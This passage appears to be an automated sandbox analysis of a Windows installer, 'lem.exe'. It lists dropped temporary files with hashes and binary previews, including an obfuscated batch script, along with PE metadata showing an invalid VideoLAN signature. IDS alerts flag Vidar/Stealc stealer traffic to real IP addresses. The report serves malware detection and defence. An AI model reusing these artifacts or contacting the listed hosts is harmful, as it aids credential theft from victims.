                                                                        Preview:.r.r.r.g.g.h.h.h.h.h.h.h.h.h.h.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.r.r.i.i.i.i.i.r.r.r.r.r.r.r.r.r.r.r.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.r.r.r.r.k.k.k.k.k.l.l.l.k.k.l.k.k.k.k.k.k.j.j.j.j.j.j.j.k.k.r.r.r.r.r.r.m.m.m.m.m.m.m.m.m.m.n.r.r.r.o.o.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.q.r.r.s.s.r.r.r.t.t.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.u.v.w.v.w.w.w.w.w.w.w.r.w.x.w.x.x.w.w.w.w.w.w.w.w.v.v.v.v.v.v.w.w.w.w.w.w.w.w.w.w.r.r.w.y.y.y.y.y.y.y.y.y.y.r.r.r.r.r.r.y.y.y.y.y.y.y.y.y.y.r.r.r.r.r.r.z.z.z.z.z.z.z.{.z.z.z.z.z.z.r.r.m.m.m.m.m.m.m.m.m.m.m.m.m.m.|.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.}.}.}.}.~...............................................................................................}

                                                                        C:\Users\user\AppData\Local\Temp\Slovakia

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):62464
                                                                        Entropy (8bit):6.532990002417595
                                                                        Encrypted:false
                                                                        SSDEEP:1536:phPc5pLW5N1c+d9YUtq5YdzhtD4RLGki26nWRgRPaM+:ph8p65Nu+dVtqi/x4Rqf21RgaN
                                                                        MD5:77BA11AF3B0AC1E81A97C07CD6AF2F81
                                                                        SHA1:3CB0307E64AD3C95BFA6C557E7D9F578E4715E70
                                                                        SHA-256:BB24D79DB3FD448CCA16C1DB1FD30E97B2EB4013719E7234B4EB1B028DB76172
                                                                        SHA-512:CB995B1137070B1243429208C4A19F4517A9DC396C06C572239A4E2B24C85CBD55B2BEF559961B25C0443FB3C2455DE3B2E1588FD388A6A7B61812A1938B3203
                                                                        Malicious:false
                                                                        Preview:...V....}..uP...M.j4....fq.....E.4..E.P.M......P....p...M...W...u..E.P.u..E..WPj..7.........}.........M..7....M...E..A..E..A..E..A..M..E....U...u..u...|.I.....L..u....P..E...~L....M.f.E.3.j.f.E..p...E..M.E.E.P......'....u..E..WPj..8....M.E..M....U.M.....u........t?...M.j4....]p...M..y......M..u.....o...E...P.u..E.WPj..=....E..M...V...E...yl.U.3..j....Zf9P.t1.....E.....@.f;E.u.A..f;E.u.I..~.j.Zf;.u....B.....3.Wh.....H.........Wh....H....O7....3..M..U....M...n...._^..]...U..V..~..t..u..N.....F...+Wj..DI....Y..t..u..g.........3..F..G..~._..^]....y...A.t..@..V..~..u h..I.....I.....t.h.K.P....I..F..F.^..u...C..U...$....}..u.h..I..6.E.P.]....E.P.u.......h....P.........u.f............P.M...R...E...]...U...$.E.P.......t..@.@..3...].U...$.}..u.h.@...e...Q.E.P...YY..t.3....E.VW.}..u.j.Y._^..]...Vj....R.......Y.V.^.U..S.].3.VW.}..E..7j5.@......P.Xf;.u..F.....u...t....f..Gu.A.+jHXf;.u...u..].j5.C.[.D..f9X..].u2I..f...t)F.7.....].j5.C.[...f9X..].t.jHXf;.t..F..._^[]

                                                                        C:\Users\user\AppData\Local\Temp\Smith

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):7.997967698346819
                                                                        Encrypted:true
                                                                        SSDEEP:1536:ZF/2Zb58naQOect9dKgJfOEtmIcPcDOSnPnKXAMuPt6iziT7qg4AbsV2wn60ptiy:/eZ18naQOecxKA2EtmFPchP1tkT7nbs1
                                                                        MD5:6C691518457F3209EEC799C6F9671AEF
                                                                        SHA1:C75D7327295B5E4483E3177A7A605009D97ECDD5
                                                                        SHA-256:DF32A06032474CB11913B8CE9B94CF26CA6F2CAA6397A0FBFE83342E6E1EF150
                                                                        SHA-512:BE761CE05CB72B7191C55725B6529AD667BA25164C06004398104D4261D2C0E5712EFCD65CA5441DC753AE8855469DABCF11AAB93CB15F83C6C13C0FCE58093B
                                                                        Malicious:false
                                                                        Preview:....R..'.....W......9.Jr....Y..Q..........i.m}{[.....T7...ZvH.r....T.S?....A.k..}.>...R...;..s.up......=.-.Y......GB.CL.;V....... k........-[.?7...nn.1k.f+Y.........D#...7.A..........95p.B.........M-\..7ed../...6|.)..2....u.JT..........g.....D..QH.g...qM=.n.....t.......Z.f..(.&..*.W......+....&[E{...#."......._...|'.....L...............&.4]/r..+`.. .N.e.v..z........o..Y...oD.V......u?.....Q.[.......T.iT....%$+Q..*B..))..E.f.+zW.'.Fl5ym.6_.....F."...O.......2..&....3b.VfVqO..I..S...mcA.Z..ptC..k..V..E"l....B..E$....b...E.#;.+.....w..g.Ux...%..i...Qj..5.0....\mZ=..m.5j*....s.F>.V+.}.V...+.He..1..&...H.5.&..TG|v.;.Y%.p.A\.%.,.7...x.....7.....3.....\.......S..*/B.p..9'..I_..nz<.....=e.......f.........l..........j....H.{...UL9P....Jnv0.....,.....z...H.{L....B...a.U.@,..P..D4..2.T.9.Ed.tw..A...........?.s.3...L8.<.2.s.Q..b...n7.-...*U..H.mg-.>#.(..4.n....!....2..K..X..L.U...\61.8b.....8.h?...).;.K.'..........[.....$}.q.w.<kg...;".

                                                                        C:\Users\user\AppData\Local\Temp\Specifications

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):105472
                                                                        Entropy (8bit):7.998372853281664
                                                                        Encrypted:true
                                                                        SSDEEP:1536:r4FKJB620g24UpULrX9sEUf6dXCMwOSUx6QLl3GPhimmooLs7ioPUNeinbZcpkss:r4Ezt0ibLrSpkiWx3IhiKogwn9cxH1m
                                                                        MD5:A351EA814B97D581B6F6DF357899A8A1
                                                                        SHA1:0F054F7B2E965DB4B0603CCAB99EB560D82A2CDA
                                                                        SHA-256:8F7C5E402D4D76C19C42B46F0DEBCFDD99C6B2403C4284218EF39A14C042BDC9
                                                                        SHA-512:8A1A3ADC0CDE5EB39DF0B94C015C93EB605BA1074A8214EBE9C39D10FA1AD59F38B0B0F021F2534E88C29A3923218262B765D9729BCF400907E329E2F2B66A0B
                                                                        Malicious:false
                                                                        Preview:2X:$..L.7:....2..d...H..M_..d.3B5.B.W...P..-%..../z.W.;.N"_.6..a.y.....]..A."3...k.N.i..Nb}.p.b'V:....1...ZUC.(e...|.-O......UL3.|....P..T2...\..a......~9 ...z...~......w._.gg...?'.n-.r1W...4B.6ov .._.^.......H.\D?z..9K4o.<.;...,.).D.Nu..}.y..-.j=.....)...A...Lx"..[..@.L.q..<y.t+Cy"...G.r.m.., @.h.w.E8........Z..a...7O.V.1YW.#........,.c"......|.W.pM.pQ....r....+..I..j..i*3j...4..*rF?.[..T~....5......k....D.O..nCk........%....9.'..bIz)....^...u.+\.d.....9...%S.w!."....>.5..7<g..w?.....$i.(.$...Y..6..Q..d..]........i.._K.X..e.D...L.>k..~*r=W.."W..:)YG,QS...LdW.O'..<..f';ym....m-\Wu.E..X..C\~..l.%..of....A;..h.....\....].gD./5X....T.@...U<bQ...+....3.P/........._.....Srb.T!;..H........'".V......j.}.d....#~.5.h..ya..3.P.*.9.O.Vs...~.Y.'..5=.....$.D.....{.~........{9"G...wKM.....ee.H...S...t.X.Y..B.fP.._.i.4.Z.B...mnS}%A.......>}.o.A.L.8.q.8<.|.&Cp..(.;.wt.. .z.y.Yw...RX./K.k./$....L...|44......W.......9l....oL..2........<D.|:Q.L.,B...@...;.........

                                                                        C:\Users\user\AppData\Local\Temp\Stats

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):17408
                                                                        Entropy (8bit):4.644200516744838
                                                                        Encrypted:false
                                                                        SSDEEP:192:hHhOmbnnnnn6EkGwuvCbCC99qpF9DAgFKPS/gkh888888SS8888888888888888D:hBcEZbvlF2c/mwft7
                                                                        MD5:AD520F194518A11C7447187B8619FD04
                                                                        SHA1:51DEE54B1AC28CB2D388707B6FB032E88638B1B2
                                                                        SHA-256:3471829A3C70D0871A10543BBE7BECF3E5EABA32BBC274DA9F2325BF0B3A7DF3
                                                                        SHA-512:3BC1C286641B03272048AD77E236D985D7AE42A754ECD46A04D67C926C1AC916FBDF54D91F7EAE47E23F902BA9F0E5CCAD40B952988CB3AB229049E43C955D12
                                                                        Malicious:false
                                                                        Preview:.......y.......>.......>.......>.......O.......r.......r.......r.......f.......f.......f.......v.......v.......v.......v.......v.......v.......v.......b.......b.......b.......b.......h.......h.......h.......h.......................p.......p.......p...........................S...s...........................................................................E.......................................................................................................................................................................`...a...................&!......K...k...*!..............+!.......................................... !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................................................. !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~..........................

                                                                        C:\Users\user\AppData\Local\Temp\Surfaces

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):6.469008351623293
                                                                        Encrypted:false
                                                                        SSDEEP:384:vrfCcU0oSMFHEQs4NyYLYeQVuMt2FoLglQRrJZC8w4WxqlVGQl3DPCyR:vjrUTSu7YeQ0p4pZP40VLhDPC+
                                                                        MD5:739EA96042FC7CD86384BA367A9279BD
                                                                        SHA1:79D5A3C1CA8A3A15D6E98DA095B6B6A64A18EDCA
                                                                        SHA-256:DF5E4A5572729CD7D99C2D4575D2DC97515D4E2AB07F5B2BFFC49650DE0A8A3D
                                                                        SHA-512:9750A92FEB02A7DEA2881E9B15177578EE2115283E0314F174DADB7BA9DC56E101B95560E3F451D681F8908292EF0D7DB54E6221A264D9D1E140E360FF639997
                                                                        Malicious:false
                                                                        Preview:..-...]......v...E..........v..3..........v.........Dx...K..E.P.nR...]....v..Q......E......:w..........:w...$.\.D..E.....(w..P..\.I..u..<........w...u......w...N..{...V..........v...M......v..Q.j8....v...E..p..........u..........v...M......v..Q..q...v...M......v..Q..q...v...u......v.........V........pv...E..@..D....@.Pj{......M..G.....M...g...M..K+.......t............j..E.PV.u.......x.]...v...{.....v...s..N..^....t..Q.....F.......v..........Wt...$...D....p..........6.M......5t..P..\.I......p..........6.)...E......t...H......E......s..........u..........s....C.Pj|........t...u...VS.u..u...........s.......s...C....t,...t'...P<....u..E....@.Ph.....X.......s.....)<....u..u..M.......M...f.E.3..{..f.E.uLj..*.....Ms...M.E.E.P.......m...u..E.V.u...Pj...c......B..........uf.4...j4.U*...E...P..s..P.M...)...M.......M.E.P......l...u..E.PV.u..E...Pj............................M..e...M...)...r...{....jr...s..N..Z....r..Q.....F......Sr..........Sr...$...D....E.....?r..

                                                                        C:\Users\user\AppData\Local\Temp\Uniform

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:ASCII text, with very long lines (794), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13274
                                                                        Entropy (8bit):5.052407282928475
                                                                        Encrypted:false
                                                                        SSDEEP:384:LhU1m2ba7+CG/72va+HHb1GvpCMuECB7GvAd3:dULEGqy+GpxLCB6vm
                                                                        MD5:6E17C40514125AF32038C0515E080676
                                                                        SHA1:85FA858D2A5CF7F1036278F5DDB75EB4E6740FAF
                                                                        SHA-256:B8F7BFD9621C81F65F9194D7F1CB2C3E91716C0478385380FB3CB219937AF8E3
                                                                        SHA-512:FDB0278B2428454B7617972022865C68BCD64198F44B9CB6105320B34849963667F24C0629CF2A2F0E9D789E281BDE9A82B5D7BB8DCD1DF348DD973003888FB3
                                                                        Malicious:false
                                                                        Preview:Set Kind=T..ZNExpressions Scripts Acquisitions Og Pathology ..yALifetime Mba Rich Puerto Monaco Tide Turning Professionals Shall ..OlsCSecretary Binary Investing Longer Tumor Trace Appreciate Sentences Brief ..mgNXVolkswagen ..ICdEnvironments Copy Chain Holdem Mic Possession Docs Examinations ..sZhqMeal Pvc Mounted Much Acceptable Involvement Rescue Pays ..tGoNRaid Formation Marie Scan Cp Brand Jvc ..Set Temp=z..ajJosh Can Leu Lately Agreed Rep Burner Lobby ..RtString Capability Petersburg Fire Audience ..xWCFSecurities Coral Amenities Ties Fee Pierce ..nkODocumentary Linda Fires Morocco Notebook Holidays Orgasm ..nBDegrees Format Which Sole Malawi ..dYDelays Teddy Legislature ..Set Quiz=O..ROSSSubaru Ru Clearance Suffering ..ZmWater Energy ..utWatched Pn Triple ..uioIraqi Indonesian Gilbert ..GgMorocco Stanford Fioricet Oh Commentary North ..lyJRj Buyer Abuse Abc Tone ..Set Reviewer=B..ddVRecovery Puts Components ..fLnFtp Continental ..xbZTour Rating Lawrence Jill Shopper ..EzejManufa

                                                                        C:\Users\user\AppData\Local\Temp\Uniform.cmd (copy)

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:ASCII text, with very long lines (794), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13274
                                                                        Entropy (8bit):5.052407282928475
                                                                        Encrypted:false
                                                                        SSDEEP:384:LhU1m2ba7+CG/72va+HHb1GvpCMuECB7GvAd3:dULEGqy+GpxLCB6vm
                                                                        MD5:6E17C40514125AF32038C0515E080676
                                                                        SHA1:85FA858D2A5CF7F1036278F5DDB75EB4E6740FAF
                                                                        SHA-256:B8F7BFD9621C81F65F9194D7F1CB2C3E91716C0478385380FB3CB219937AF8E3
                                                                        SHA-512:FDB0278B2428454B7617972022865C68BCD64198F44B9CB6105320B34849963667F24C0629CF2A2F0E9D789E281BDE9A82B5D7BB8DCD1DF348DD973003888FB3
                                                                        Malicious:false
                                                                        Preview:Set Kind=T..ZNExpressions Scripts Acquisitions Og Pathology ..yALifetime Mba Rich Puerto Monaco Tide Turning Professionals Shall ..OlsCSecretary Binary Investing Longer Tumor Trace Appreciate Sentences Brief ..mgNXVolkswagen ..ICdEnvironments Copy Chain Holdem Mic Possession Docs Examinations ..sZhqMeal Pvc Mounted Much Acceptable Involvement Rescue Pays ..tGoNRaid Formation Marie Scan Cp Brand Jvc ..Set Temp=z..ajJosh Can Leu Lately Agreed Rep Burner Lobby ..RtString Capability Petersburg Fire Audience ..xWCFSecurities Coral Amenities Ties Fee Pierce ..nkODocumentary Linda Fires Morocco Notebook Holidays Orgasm ..nBDegrees Format Which Sole Malawi ..dYDelays Teddy Legislature ..Set Quiz=O..ROSSSubaru Ru Clearance Suffering ..ZmWater Energy ..utWatched Pn Triple ..uioIraqi Indonesian Gilbert ..GgMorocco Stanford Fioricet Oh Commentary North ..lyJRj Buyer Abuse Abc Tone ..Set Reviewer=B..ddVRecovery Puts Components ..fLnFtp Continental ..xbZTour Rating Lawrence Jill Shopper ..EzejManufa

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.969718034999908
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:lem.exe
                                                                        File size:863'224 bytes
                                                                        MD5:bb74165a5eb382a47e26f4efd8c2f151
                                                                        SHA1:cb6f613025a9b8cf64bd90ae3813beb4e872e93f
                                                                        SHA256:d3b3da570c489317ccaa129c2c66cc8765afaf20b5e4ccc24a88dd6b90e64920
                                                                        SHA512:b7eee12ed05aed95d20b28fab96ab6f033efa2a70efe38f487a7f19783cd69097b3b0361b12f3a9ce68ee001da0a0a27d0ddfeff9c85b5c668d9b20a2ec153b9
                                                                        SSDEEP:24576:1s2k09zcWIh8+6jQxF3jkwacXh9+Ip4S1P5v3:1k0Z/NaFzkeh9ES1P9
                                                                        TLSH:EF0523878AA86C2AEAA78DB1247485369E76FD0315F0C0CB9385C84DB771B4495FC36F
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                        File Icon

                                                                        Icon Hash:f1f8fae0cdcdee60

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403883
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 07/06/2024 02:00:00 09/06/2027 01:59:59
                                                                        Subject Chain
                                                                        • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                                        Version:3
                                                                        Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                                        Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                                        Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                                        Serial:09D08EBDA06BE07C815EA7AF25EF6875

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 000002D4h
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        push edi
                                                                        push 00000020h
                                                                        xor ebp, ebp
                                                                        pop esi
                                                                        mov dword ptr [esp+18h], ebp
                                                                        mov dword ptr [esp+10h], 00409268h
                                                                        mov dword ptr [esp+14h], ebp
                                                                        call dword ptr [00408030h]
                                                                        push 00008001h
                                                                        call dword ptr [004080B4h]
                                                                        push ebp
                                                                        call dword ptr [004082C0h]
                                                                        push 00000008h
                                                                        mov dword ptr [00472EB8h], eax
                                                                        call 00007F5954B3D8EBh
                                                                        push ebp
                                                                        push 000002B4h
                                                                        mov dword ptr [00472DD0h], eax
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push eax
                                                                        push ebp
                                                                        push 00409264h
                                                                        call dword ptr [00408184h]
                                                                        push 0040924Ch
                                                                        push 0046ADC0h
                                                                        call 00007F5954B3D5CDh
                                                                        call dword ptr [004080B0h]
                                                                        push eax
                                                                        mov edi, 004C30A0h
                                                                        push edi
                                                                        call 00007F5954B3D5BBh
                                                                        push ebp
                                                                        call dword ptr [00408134h]
                                                                        cmp word ptr [004C30A0h], 0022h
                                                                        mov dword ptr [00472DD8h], eax
                                                                        mov eax, edi
                                                                        jne 00007F5954B3AEBAh
                                                                        push 00000022h
                                                                        pop esi
                                                                        mov eax, 004C30A2h
                                                                        push esi
                                                                        push eax
                                                                        call 00007F5954B3D291h
                                                                        push eax
                                                                        call dword ptr [00408260h]
                                                                        mov esi, eax
                                                                        mov dword ptr [esp+1Ch], esi
                                                                        jmp 00007F5954B3AF43h
                                                                        push 00000020h
                                                                        pop ebx
                                                                        cmp ax, bx
                                                                        jne 00007F5954B3AEBAh
                                                                        add esi, 02h
                                                                        cmp word ptr [esi], bx

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x4460.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xcd0880x5b70.ndata
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xf40000x44600x4600bc040da62825804f5e6ba24f4e31f844False0.8466517857142857data7.247087220796674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xf90000xf320x10009a36c77062417185e9e84210d8c60955False1.002685546875data7.931927207151483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xf41f00x2751PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010928961748633
                                                                        RT_ICON0xf69480x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6955828779599271
                                                                        RT_ICON0xf7a700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8200354609929078
                                                                        RT_DIALOG0xf7ed80x100dataEnglishUnited States0.5234375
                                                                        RT_DIALOG0xf7fd80x11cdataEnglishUnited States0.6056338028169014
                                                                        RT_DIALOG0xf80f80x60dataEnglishUnited States0.7291666666666666
                                                                        RT_GROUP_ICON0xf81580x30dataEnglishUnited States0.8541666666666666
                                                                        RT_MANIFEST0xf81880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                        2024-08-05T18:55:53.040452+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49715443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:37.229200+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49737443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:56.073425+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49717443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:09.165224+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49725443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:48.655006+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49748443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:51.591528+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49713443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:51.563057+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49750443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:56.753779+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST49717443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:53.756676+0200TCP2054495ET MALWARE Vidar Stealer Form Exfil4975280192.168.2.538.180.132.96
                                                                        2024-08-05T18:56:42.427737+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49742443192.168.2.5188.245.87.202
